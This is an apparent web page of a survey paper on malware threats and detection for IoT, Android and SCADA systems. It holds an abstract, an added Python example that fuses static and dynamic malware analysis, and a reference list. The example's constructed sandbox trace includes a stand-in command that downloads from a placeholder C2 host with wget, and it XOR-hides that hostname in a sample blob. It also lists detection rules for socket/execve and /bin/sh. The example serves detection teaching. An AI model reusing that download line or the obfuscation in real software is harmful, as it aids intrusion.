Abstract
Today everyone expects more services and wants them available at the click of a button. To offer these services quickly, developers assemble systems from prebuilt modules, which makes development easy and lets services be offered almost instantly. These services are connected to the internet and accessed from Android phones and IoT devices. Such prebuilt modules, however, carry many vulnerabilities, bugs, and default settings that can be hard to change; changing the password of a home Wi-Fi router, for example, may require an external application and OTP verification. Because of these issues, and because new hacking tools and techniques keep appearing, security is a major challenge today. The basic framework for adequate system security rests on five principles: integrity, confidentiality, availability, privacy, and non-repudiation. An attacker can exploit any shortcoming in these, leading to a range of problems. This work explores the causes of threats and vulnerabilities, particularly in IoT, IIoT, SCADA, and Android application systems. It is organised in several sections: a short introduction to malware and how it infects a system, followed by a detailed malware exploitation plan of the kind expert attackers follow to exploit vulnerabilities in critical infrastructure or to defame an organisation or country. A framework-based introduction to IoT and Android is also presented, with the common vulnerabilities at each stage and the corresponding mitigation strategies. Both static and dynamic analyses are evaluated; for better model design and evaluation, both are highly recommended when implementing effective malware detection strategies.
Along with these models, honeynets, IDS, IPS, hardware-based protections (CPU and memory) and forensic analysis are also very effective at protecting the infrastructure.
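The abstract's recommendation to combine static and dynamic analysis is easiest to see on a case where each method fails alone. The following is an added example written for this page, not code from the paper: the ELF-like byte blob, the strace-style trace lines, the C2 hostname `update.example-c2.test` and the scoring thresholds are all constructed for illustration. A single-byte XOR hides the C2 hostname from a static strings pass, while a sandbox-aware run produces a harmless trace that hides the behaviour from dynamic analysis; merging the two feature sets is the only view that reaches a confident verdict.

```python
"""Static + dynamic feature fusion for malware triage (added example, not from the paper)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR, the cheapest string obfuscation seen in commodity bot samples."""
    return bytes(b ^ key for b in data)


# --- constructed inputs (hypothetical indicator, not a real binary or trace) ---
C2_HOST = "update.example-c2.test"
SAMPLE_BINARY = (
    b"\x7fELF" + b"\x00" * 12
    + b"libc.so.6\x00socket\x00connect\x00execve\x00"
    + xor_bytes(C2_HOST.encode("ascii"), 0xFF)   # hostname obfuscated at rest
    + b"\x00/bin/sh\x00"
)
# strace-style lines a sandbox records when the sample actually runs its payload
TRACE_RUNS = """\
socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("203.0.113.10")}, 16) = 0
execve("/bin/sh", ["/bin/sh", "-c", "wget http://update.example-c2.test/x"], ...) = 0
"""
# the same sample recognising the sandbox hostname and exiting before doing anything
TRACE_EVADES = """\
uname({sysname="Linux", nodename="sandbox-01", ...}) = 0
exit_group(0) = ?
"""

STRING_RE = re.compile(rb"[\x20-\x7e]{4,}")            # printable runs, like strings(1)
SYSCALL_RE = re.compile(r"^(\w+)\((.*)\)\s*=\s*(\S+)", re.M)
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
PORT_RE = re.compile(r"htons\((\d+)\)")
NET_EXEC_IMPORTS = {"socket", "connect", "execve"}
KNOWN_C2 = {C2_HOST}


@dataclass
class Features:
    strings: set = field(default_factory=set)   # static
    imports: set = field(default_factory=set)   # static
    syscalls: set = field(default_factory=set)  # dynamic
    hosts: set = field(default_factory=set)     # dynamic
    ports: set = field(default_factory=set)     # dynamic


def static_features(blob: bytes) -> Features:
    """What a strings/import pass sees without running the sample."""
    strings = {s.decode("ascii") for s in STRING_RE.findall(blob)}
    return Features(strings=strings, imports=strings & NET_EXEC_IMPORTS)


def dynamic_features(trace: str) -> Features:
    """What a sandbox records; only as good as the execution path the sample took."""
    f = Features()
    for name, args, _ret in SYSCALL_RE.findall(trace):
        f.syscalls.add(name)
        f.hosts.update(HOST_RE.findall(args))
        f.ports.update(int(p) for p in PORT_RE.findall(args))
    return f


def merge(a: Features, b: Features) -> Features:
    return Features(a.strings | b.strings, a.imports | b.imports,
                    a.syscalls | b.syscalls, a.hosts | b.hosts, a.ports | b.ports)


def find_xor_encoded(blob: bytes, needle: str) -> Optional[int]:
    """Brute-force single-byte XOR keys to locate a known indicator hidden in the blob."""
    enc = needle.encode("ascii")
    for key in range(1, 256):
        if xor_bytes(enc, key) in blob:
            return key
    return None


def triage(f: Features) -> Tuple[str, List[str]]:
    """Rule-based scoring; the rules and thresholds are illustrative, not the paper's."""
    reasons = []
    if NET_EXEC_IMPORTS <= f.imports:
        reasons.append("static: imports socket/connect/execve")
    if "/bin/sh" in f.strings:
        reasons.append("static: embeds /bin/sh")
    if (f.strings | f.hosts) & KNOWN_C2:
        reasons.append("indicator: references known C2 host")
    if {"socket", "connect", "execve"} <= f.syscalls:
        reasons.append("dynamic: network connection followed by process execution")
    verdict = "malicious" if len(reasons) >= 3 else "suspicious" if reasons else "benign"
    return verdict, reasons


if __name__ == "__main__":
    s = static_features(SAMPLE_BINARY)
    for label, f in [("static only", s), ("dynamic only (runs)", dynamic_features(TRACE_RUNS)),
                     ("dynamic only (evades)", dynamic_features(TRACE_EVADES)),
                     ("static + dynamic", merge(s, dynamic_features(TRACE_RUNS)))]:
        print(f"{label:24s} -> {triage(f)}")
    print("XOR key hiding the C2 host:", find_xor_encoded(SAMPLE_BINARY, C2_HOST))
```

Static analysis alone stops at "suspicious" because the obfuscated hostname never appears as a string; the dynamic trace alone also stops at "suspicious", and drops to "benign" when the sample detects the sandbox. Only the merged feature set crosses the "malicious" threshold, and the known indicator recovered by `find_xor_encoded` is what lets the static side be refined once the dynamic run has revealed the hostname.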
Data availability
Data sharing not applicable to this article as no datasets were generated or analysed during the current study.
Mira F, Brown A, Huang W. Novel malware detection methods by using LCS and LCSS. In: 2016 22nd International Conference on Automation and Computing (ICAC), pp. 554–559. 2016.
Shabtai A, Moskovitch R, Elovici Y, Glezer C. Detection of malicious code by applying machine learning classifiers on static features: a state-of-the-art survey. Inf Secur Tech Rep. 2009;14(1):16–29.
Damodaran A, Di Troia F, Visaggio CA, Austin TH, Stamp M. A comparison of static, dynamic, and hybrid analysis for malware detection. J Comput Virol Hacking Tech. 2017;13(1):1–12.
Barabosch T, Gerhards-Padilla E. Host-based code injection attacks: a popular technique used by malware. In: 2014 9th International Conference on Malicious and Unwanted Software: The Americas (MALWARE), pp. 8–17. 2014.
Snow KZ, Rogowski R, Werner J, Koo H, Monrose F, Polychronakis M. Return to the zombie gadgets: undermining destructive code reads via code inference attacks. IEEE Symp Secur Priv (SP). 2016;2016:954–68.
Lee B, Lu L, Wang T, Kim T, Lee W. From zygote to morula: fortifying weakened aslr on android. IEEE Symp Secur Priv. 2014;2014:424–39.
Gisbert HM, Ripoll I. On the effectiveness of nx, ssp, renewssp, and aslr against stack buffer overflows. In: 2014 IEEE 13th International Symposium on Network Computing and Applications, pp. 145–152. 2014.
Rohlf C, Ivnitskiy Y. The security challenges of client-side just-in-time engines. IEEE Secur Priv. 2012;10(2):84–6.
Van Der Veen V, et al. A tough call: mitigating advanced code-reuse attacks at the binary level. IEEE Symp Secur Priv (SP). 2016;2016:934–53.
Xiao X, Yan R, Ye R, Li Q, Peng S, Jiang Y. Detection and prevention of code injection attacks on HTML5-based apps. Third Int Conf Adv Cloud Big Data. 2015;2015:254–61.
Brookes S, Osterloh M, Denz R, Taylor S. The KPLT: the kernel as a shared object. In: MILCOM 2015–2015 IEEE Military Communications Conference, pp. 954–959. 2015.
Chen P, Wu R, Mao B. JITSafe: a framework against Just-in-time spraying attacks. IET Inf Secur. 2013;7(4):283–92.
Kil C, Jun J, Bookholt C, Xu J, Ning P. Address space layout permutation (ASLP): towards fine-grained randomization of commodity software. In: 2006 22nd Annual Computer Security Applications Conference (ACSAC’06), pp. 339–348. 2006.
Hoekstra M, Lal R, Pappachan P, Phegade V, Del Cuvillo J. Using innovative instructions to create trustworthy software solutions. HASP@ ISCA. 2013;11(10): 2487726–2488370.
De la Hoz E, Cochrane G, Moreira-Lemus JM, Paez-Reyes R, Marsa-Maestre I, Alarcos B. Detecting and defeating advanced man-in-the-middle attacks against TLS. In: 2014 6th International Conference On Cyber Conflict (CyCon 2014), pp. 209–221. 2014.
Buhov D, Huber M, Merzdovnik G, Weippl E. Pin it! Improving Android network security at runtime. In: 2016 IFIP Networking Conference (IFIP Networking) and Workshops, 2016, pp. 297–305.
Merzdovnik G, Buhov D, Voyiatzis AG, Weippl ER (2016) Notary-assisted certificate pinning for improved security of android apps. In: 2016 11th International Conference on Availability, Reliability and Security (ARES), pp. 365–371. 2016.
Jiang S, Li W, Li H, Zhang Y, Zhang H, Liu Y. Fault localization for null pointer exception based on stack trace and program slicing. In: 2012 12th International Conference on Quality Software, pp. 9–12. 2012.
Romano D, Di Penta M, Antoniol G. An approach for search based testing of null pointer exceptions. In: 2011 Fourth IEEE International Conference on Software Testing, Verification and Validation, pp. 160–169. 2011.
Ma S, Jiao M, Zhang S, Zhao W, Wang DW. Practical null pointer dereference detection via value-dependence analysis. IEEE Int Symp Softw Reliab Eng Worksh (ISSREW). 2015;2015:70–7.
Hsu F-H, Tso C-K, Yeh Y-C, Wang W-J, Chen L-H. Browserguard: a behavior-based solution to drive-by-download attacks. IEEE J Sel areas Commun. 2011;29(7):1461–8.
Cheng H, Yong F, Liang L, Wang L-R. A static detection model of malicious PDF documents based on naive Bayesian classifier technology. Int Conf Wavelet Act Media Technol Inform Proces (ICWAMTIP). 2012;2012:29–32.
Al-Taharwa IA, Lee H-M, Jeng AB, Ho C-S, Wu K-P, Chen S-M. Drive-by disclosure: a large-scale detector of drive-by downloads based on latent behavior prediction. In: 2015 IEEE Trustcom/BigDataSE/ISPA, vol. 1, pp. 334–343. 2015.
Welch I, Gao X, Komisarczuk P. Detecting heap-spray attacks in drive-by downloads: Giving attackers a hand. In: 38th Annual IEEE Conference on Local Computer Networks, pp. 300–303. 2013.
Malipatlolla S, Feller T, Shoufan A, Arul T, Huss SA. A novel architecture for a secure update of cryptographic engines on trusted platform module. Int Conf Field-Program Technol. 2011;2011:1–6.
Maybaum M, Toelle J. ARMing the trusted platform module pro-active system integrity monitoring focussing on peer system notification. In: MILCOM 2015–2015 IEEE Military Communications Conference, pp. 1584–1589. 2015.
Razmi MAY, Hashim H. Forming virtualized test bed for Trusted Platform Module in Windows environment. IEEE Int Conf Comput Appl Ind Electron (ICCAIE). 2011;2011:645–50.
Yu Z, Wang Q, Zhang W, Dai H. A cloud certificate authority architecture for virtual machines with trusted platform module. In: 2015 IEEE 17th International Conference on High Performance Computing and Communications, 2015 IEEE 7th International Symposium on Cyberspace Safety and Security, and 2015 IEEE 12th International Conference on Embedded Software and Systems, pp. 1377–1380. 2015.
Kim D, Jeon Y, Kim J. A method based on platform integrity verification for activating a mobile trusted module. Int Conf Inform Commun Technol Converg (ICTC). 2015;2015:1174–6.
Zhang F, Leach K, Sun K, Stavrou A. Spectre: A dependable introspection framework via system management mode. In: 2013 43rd Annual IEEE/IFIP international conference on dependable systems and networks (DSN), pp. 1–12. 2013.
Messaoud BID, Guennoun K, Wahbi M, Sadik M. Advanced persistent threat: new analysis driven by life cycle phases and their challenges. Int Conf Adv Commun Syst Inform Secur (ACOSIS). 2016;2016:1–6.
Mahboob A, Zubairi JA. “Securing SCADA systems with open source software. High Cap Opt Netw Emerg Enabl Technol. 2013;2013:193–8.
Jain P, Tripathi P. SCADA security: a review and enhancement for DNP3 based systems. CSI Trans ICT. 2013;1(4):301–8.
Yang Y, McLaughlin K, Littler T, Sezer S, Wang HF. Rule-based intrusion detection system for SCADA networks. 2013.
MacDermott Á, Shi Q, Merabti M, Kifayat K. Intrusion detection for critical infrastructure protection. 2012.
Yang Y, McLaughlin K, Sezer S, Yuan YB, Huang W. Stateful intrusion detection for IEC 60870-5-104 SCADA security. In: 2014 IEEE PES General Meeting| Conference & Exposition, pp. 1–5. 2014.
Oman P, Phillips M. Intrusion detection and event monitoring in SCADA networks. In: International Conference on Critical Infrastructure Protection, pp. 161–173. 2007.
Fovino IN, Coletta A, Carcano A, Masera M. Critical state-based filtering system for securing SCADA network protocols. IEEE Trans Ind Electron. 2011;59(10):3943–50.
Kirsch J, Goose S, Amir Y, Wei D, Skare P. Survivable SCADA via intrusion-tolerant replication. IEEE Trans Smart Grid. 2013;5(1):60–70.
Carcano A, Coletta A, Guglielmi M, Masera M, Fovino IN, Trombetta A. A multidimensional critical state analysis for detecting intrusions in SCADA systems. IEEE Trans Ind Inform. 2011;7(2):179–86.
Winn M, Rice M, Dunlap S, Lopez J, Mullins B. Constructing cost-effective and targetable industrial control system honeypots for production networks. Int J Crit Infrastruct Prot. 2015;10:47–58.
Baecher P, Koetter M, Holz T, Dornseif M, Freiling F. The nepenthes platform: an efficient approach to collect malware. In: International Workshop on Recent Advances in Intrusion Detection, pp. 165–184. 2006.
Disso JP, Jones K, Bailey S. A plausible solution to SCADA security honeypot systems. In: 2013 Eighth International Conference on Broadband and Wireless Computing, Communication and Applications, pp. 443–448. 2013.
Pham V-H, Dacier M. Honeypot trace forensics: the observation viewpoint matters. Futur Gener Comput Syst. 2011;27(5):539–46.
Brand M, Valli C, Woodward A. A threat to cyber resilience: a malware rebirthing botnet. 2011.
Goldenberg J, Shavitt Y, Shir E, Solomon S. Distributive immunization of networks against viruses using the ‘honey-pot’architecture. Nat Phys. 2005;1(3):184–8.
Erol-Kantarci M, Mouftah HT. Smart grid forensic science: applications, challenges, and open issues. IEEE Commun Mag. 2013;51(1):68–74.
Amnesty International Security Lab. Mobile Verification Toolkit. 2021. https://docs.mvt.re/en/latest/ (Accessed Aug. 12, 2021).
Ethics declarations
Conflict of Interest
The author declares that they have no conflict of interest.
Ethical Approval
This article does not contain any studies with human participants performed by any of the authors.
Additional information
Publisher's Note
Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.
Supplementary Information
Below is the link to the electronic supplementary material.
Rights and permissions
Springer Nature or its licensor (e.g. a society or other partner) holds exclusive rights to this article under a publishing agreement with the author(s) or other rightsholder(s); author self-archiving of the accepted manuscript version of this article is solely governed by the terms of such publishing agreement and applicable law.